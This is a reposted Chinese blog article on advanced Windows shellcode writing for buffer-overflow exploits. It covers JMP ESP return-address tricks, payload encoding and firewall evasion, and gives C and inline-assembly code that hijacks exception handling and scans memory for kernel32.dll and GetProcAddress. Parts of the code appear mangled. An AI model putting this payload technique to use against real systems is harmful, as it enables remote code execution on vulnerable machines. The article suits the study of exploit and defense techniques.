WINDOWS的SHELLCODE编写高级技巧

最新推荐文章于 2022-03-25 15:38:27 发布
最新推荐文章于 2022-03-25 15:38:27 发布
阅读量848 收藏
点赞数
分类专栏: 【安全教学】 【C Programming】 文章标签: windows api 数据结构 web服务 shell 语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/bmsdr/article/details/87562
版权

WINDOWS的SHELLCODE编写高级技巧

?

作者:yuange (mailto:yuange@nsfocus.com)

主页:http://www.nsfocus.com/

?

????unix等系统因为有用户概念,所以往往溢出是使用先得到普通帐号,然后登陆后用溢出

再加载一个SHELL的办法得到ROOT权限,其系统调用又方便,所以SHELLCODE编写一般都比

较简单。但WINDOWS系统往往不提供登陆服务,所以溢出攻击的SHELLCODE往往要提供SOCKET

连接,要加载程序得到SHELL等,而WINDOWS的系统调用int2e接口又不如unix系统调用int80

规范,所以一般都使用API,而API函数地址又因为系统版本的不同而不一样,所以要编写

WINDOWS下面比较实用、通用点的SHELLCODE比较麻烦。

?

????经过一段时间的思考,得到了WINDOWS下编写SHELLCODE的比教好的办法。

????1、溢出点确定。使用溢出点附近覆盖一片一个RET指令地址的办法,这样只要知道溢出

????点大致范围就可以了。

????2、SHELLCODE定位。使用ESP寄存器定位,只要前面那覆盖的RET地址后面放一个JMP

????ESP功能的指令地址就可以定位了。

????3、RET指令地址、JMP ESP功能指令地址采用代码页里面的地址,54 ?C3,或者FF E4

????、C3这个一个语言的WINDOWS地址固定,也很好找这个地址。

?

????4、SHELLCODE直接使用C语言编写,方便编写、修改、调试。

?

????5、SHELLCODE统一编码,满足应用条件对SHELLCODE字符的限制,用一段小汇编代码解

????码,这样编写SHELLCODE就可以不用考虑特殊字符了。

????6、通信加密,对付防火墙,实现FTP功能,实现内存直接接管WEB服务等的高级应用。

?

????下面主要介绍介绍编写通用SHELLCODE的办法。主要SHELLCODE里面使用的API自己用

GetProcAddress定位,要使用库用LoadLibraryA加载。那这样SHELLCODE就只依靠这两个

API了。那这两个API的地址又怎么解决呢,LoadLibraryA这个API在系统库KERNEL32.DLL里

面,也可以使用GetProcAddress得到。那关键就是要找到系统库kernel32.dll和

GetProcAddress的地址了。因为一般应用程序都会加载kernel32.dll,所以解决办法就是在

内存里面找到这个系统库和API地址,所幸知道了WINDOWS的模块数据结构也就不难了,主要

是增加异常结构处理 。下面是VC6.0程序代码:

?

void shellcodefn()

{

???int ????????*except[3];

???FARPROC ????procgetadd=0;

???char ???????*stradd;

???int ????????imgbase,fnbase,i,k,l;

???HANDLE ?????libhandle;

???_asm {

?????jmp ?????????nextcall

?????getstradd: ??pop ???stradd

??????????????????lea ???EDI,except

????????????mov ???eax,dword ptr FS:[0]

????????????mov ???dword ptr [edi+0x08],eax

????????????mov ???dword ptr FS:[0],EDI

????}

????except[0]=0xffffffff;

????except[1]=stradd-0x07;

/* 保存异常结构链和修改异常结构链,SHELLCODE接管异常 */

?

????imgbase=0x77e00000;

/* 搜索KERNEL32.DLL 的起始其实地址 */

?

?????????call getexceptretadd

???}

/* 得到异常后的返回地址 */

???for(;imgbase<0xbffa0000,procgetadd==0;){

???????imgbase+=0x10000;

/* ?模块地址是64K为单位,加快速度*/

???????if(imgbase==0x78000000) imgbase=0xbff00000;

/* ?如果到这还没有搜索到,那可能是WIN9X系统 */

???????if(*( WORD *)imgbase=='ZM'&& *(WORD *)

???????(imgbase+*(int *)(imgbase+0x3c))=='EP'){

/* 模块结构的模块头 */

?????????fnbase=*(int *)(imgbase+*(int *)(imgbase+0x3c)+0x78)+imgbase;

?????????k=*(int *)(fnbase+0xc)+imgbase;

?????????if(*(int *)k =='NREK'&&*(int *)(k+4)=='23LE'){

/* 模块名 */

?????????????libhandle=imgbase;

/* 得到模块头地址,就是模块句柄 */

?????????????k=imgbase+*(int *)(fnbase+0x20);

?????????????for(l=0;l<*(int *) (fnbase+0x18);++l,k+=4){

???????????????????if(*(int *)(imgbase+*(int *)k)=='PteG'&&*(int *)(4+imgbase+*(int *)k)=='Acor'){

/* 引出名 */

???????????????????k=*(WORD *)(l+l+imgbase+*(int *)(fnbase+0x24));

???????????????????k+=*(int *)(fnbase+0x10)-1;

???????????????????k=*(int *)(k+k+k+k+imgbase+*(int *)(fnbase+0x1c));

???????????????????procgetadd=k+imgbase;

/* API地址 */

???????????????????break;

?????????????}

??????????}

????????}

????}

}

// 搜索KERNEL32。DLL模块地址和API函数 GetProcAddress地址

// 注意这儿处理了搜索页面不在情况。

?

???_asm{

???????lea edi,except

??????????mov eax,dword ptr [edi+0x08]

???????mov dword ptr fs:[0],eax

???}

/* 恢复异常结构链 */

?

?

if(procgetadd==0) goto ?die ;

/* 如果没找到GetProcAddress地址死循环 */

??die: goto die ?;

?

??_asm{

?

getexceptretadd: ??pop ?eax

?????????????push eax

?????????????mov ?edi,dword ptr [stradd]

?????????????mov dword ptr [edi-0x0e],eax

?????????????ret

/* 得到异常后的返回地址,并填写到异常处理模块 */

?

/* 异常处理模块 */

errprogram: ????????mov eax,dword ptr [esp+0x0c]

?????????????add eax,0xb8

?????????????mov dword ptr [eax],0x11223344 //stradd-0xe

/* 修改异常返回EIP指针 */

?????????????xor eax,eax ?????????????//2

/* 不提示异常 */

?????????????ret ?????????????????//1

/* 异常处理返回 */

execptprogram: ????jmp errprogram ?????????????//2 bytes stradd-7

nextcall: ?????????call getstradd ?????????????//5 bytes

???}

}

bmsdr
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
windows平台下功能性shellcode编写
11-12
windows平台下功能性shellcode编写,通过高级语言编写shellcode
shellcodeWindows shellcode的理解与编写
dr0op's blog
03-31 1036
虚拟内存空间 整个虚拟内存空间分为两个相关部分: 为用户进程预留的虚拟内存空间和为系统进程预留的虚拟内存空间。 每个进程都有自己的私有虚拟地址空间,其中“内核空间”是一种“共享环境”,意味着每个内核进程可以在任何它想要的地方读写虚拟内存。 其中: HEAP(堆) : 这是存储所有动态局部变量的地方。(通常alloc()或类似的系统调用) STACK(栈): 分配每个静态局部变量的位置。 RWX-Hunter执行: 搜索已被标记为读(R),写(W)和执行(X)的内存部分。 遍历进程的虚拟空间内存,搜索标记
Hook ZwQueryInformationProcess 函数使得异常处理可以在shellcode上执行
lif12345的专栏
09-27 1612
32位系统上当你的shellcode有使用 __try __except 进行处理时,系统最终会调用RtlIsValidHandler来判断异常处理函数是否有效,如果你希望处理异常 应该是HookRtlIsValidHandler,可是微软没有导出这个接口 于是我们逆向看看RtlIsValidHandler 发现它会判断ZwQueryInformationProcess的返回值,...
windowsshellcode编写入门
热门推荐
x_nirvana的博客
03-31 1万+
本文简要介绍shellcode开发技术及其特点。理解这些概念可以有助于我们编写自己的shellcode。更进一步讲,你可以修改现有的漏洞利用代码来执行自己所需要的定制功能。
Windows Shellcode开发[1]
weixin_41487541的博客
03-24 487
0 前言 本文包含对shellcode开发技术及其特点的概述,了解了这些概念我们就可以编写自己的shellcode,而且我们还可以修改现有漏洞的shellcode来执行我们自定义的功能。 1 Shellcode介绍 维基百科中对shellcoed的介绍: “在计算机安全中,shellcode 是一小段代码,用作利用软件漏洞的有效载荷。之所以称为“shellcode”,是因为它通常启动一个命令shell,攻击者可以从中控制受感染的机器,但任何执行类似任务的代码都可以称为 shellcode……She
Study_shellcode:windows平台下功能性shellcode编写
04-29
windows平台下功能性shellcode编写 包含了5个类型的test例子,不知道从哪里下载的。 例子可能比较老,在win7,win10上可能无法成功执行,新系统的安全性比较高,最佳的环境是在XP。 补充以下不错的入门教程 ...
高级shellcode设计技巧.pdf
01-22
这篇文章总结了当前Shllcode的各种技巧和设计思路,比较有意思的是当中提到的ADMMutate.
Android系统shellcode编写.zip_android_shellcode
09-23
Android手机的普及,Android系统安全日益受人关注。漏洞攻防是安全的一大课题,其中自然少不了shellcode编写
windows 最小shellcode
01-28
363字节正向连接后门(含源码) 363字节正向连接后门(含源码)
一段动态装载DLL的ShellCode汇编代码
09-10
一段动态装载DLL的ShellCode汇编代码,不需要引入任何的库
windowsshell_一步步学写Windows下的Shellcode
weixin_39602560的博客
10-21 622
如何在WIndows编写一个shellcode?为什么会问这个问题,前段时间在做win下的Exploit,但是都是使用大佬写的shellcode,无法实现个人的一些需求。而网络上编写shellcode的教程大多是关于Linux的,加之顺带学习PE文件结构,所以打算写一篇关于Windowsshellcode编写,为要编写Shellcdoe的读者提供一些参考。摘要:在C语言中,调用一...
Windows Shellcode开发[3]
weixin_41487541的博客
03-25 5322
0 前言及编写shellcode准备工作 在Windows Shellcode开发介绍的最后一部分,我们将编写一个简单的改变鼠标左右键的shellcode。我们需要用到两个函数:SwapMouseButton和ExitProcess函数。首先看一个两个函数的参数与返回值情况: SwapMouseButton只有一个BOOL类型参数,若参为TRUE则交换鼠标左右键,返回值非0; ExitProcess也只有一个参数,代表进程退出代码。 整理一下思路: 我们需要调用以上两个函数,在C++中体现
Windows Shellcode开发[2]
weixin_41487541的博客
03-24 4425
0 前言 在这部分我们将了解正确编写Windows系统shellcode所需的信息:进程环境块和PE文件格式。上一部分在这里:Windows Shellcode开发[1] 1 进程环境块 在Windows操作系统中,PEB作为一种结构可以用于内存中固定地址的每个进程。此结构包含进程相关信息,如:可执行文件加载到内存中的地址、模块列表(DLL)、指定进程是否在调试等。在不同版本的Windows系统中,PEB各字段偏移可能会随之改变。 由于地址空间布局随机化(ASLR),DLL将被加载到不同的内存地址,
windowsshellcode高级编程
Civet148的专栏
12-26 2139
windowsshellcode高级编程黑森林 发表于 2005-10-29 22:26:00 网上关于Shellcode的文章不少,但对于windows环境下的讨论不是很多,经典的就更少了,这一篇应该不错,推荐给大家!(站长:黑森林整理)                    unix等系统因为有用户概念,所以往往溢出是使用先得到普通帐号,然后登陆后用溢出再加载一个SHELL的办法得到ROOT
利用异常处理执行shellcode实例
要饭's Blog
06-24 2424
    在《Q版缓冲区溢出教程》中有一个例子,如下:#include #include char name[] = "/x41/x41/x41/x41"       //name[0] - name[3]   "/x41/x41/x41/x41"       //name[4] - name[7]  "/x41/x41/x41/x41"       //ebp"/x12/x45/xfa/x7f
如何使用C#在Windows中利用系统调用执行Shellcode注入
qq_57222058的博客
06-24 1199
前言 在通过Sektor7恶意软件开发必修课程学习了如何使用C语言编写Shellcode注入工具之后,我希望尝试如何在C#中执行相同的操作。实际上,使用P/Invoke来运行类似的Win32 API调用,并编写一个与Sektor7类似的简单注入工具非常容易。我注意到其中的最大区别是,没有直接等效的方法来混淆API调用。在对BloodHound Slack频道进行了一些研究和提问之后,在@TheWover和@NotoriousRebel的帮助下,我发现有两个主要的领域可以进行研究,一个是使用本地Wi...
Windowsshellcode 编写
aptx4869_li的博客
06-16 1989
Windows下的shellcode编写首先,我们先了解一下shellcode是什么?Shellcode实际是一段代码(也可以是填充数据),是用来发送到服务器利用特定漏洞的代码,一般可以获取权限。另外,Shellcode一般是作为数据发送给受攻击服务器的。 Shellcode是溢出程序和蠕虫病毒的核心,提到它自然就会和漏洞联想在一起,毕竟Shellcode只对没有打补丁的主机有用武之地。网络上数...
shellcode编写
最新发布
06-28
编写shellcode需要了解汇编语言和操作系统内部工作原理。步骤包括确定目标系统平台、编写汇编代码、使用汇编器将代码转换为机器码并去除不必要的部分。最后,通过十六进制编辑器将机器码转换为可执行的shellcode

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值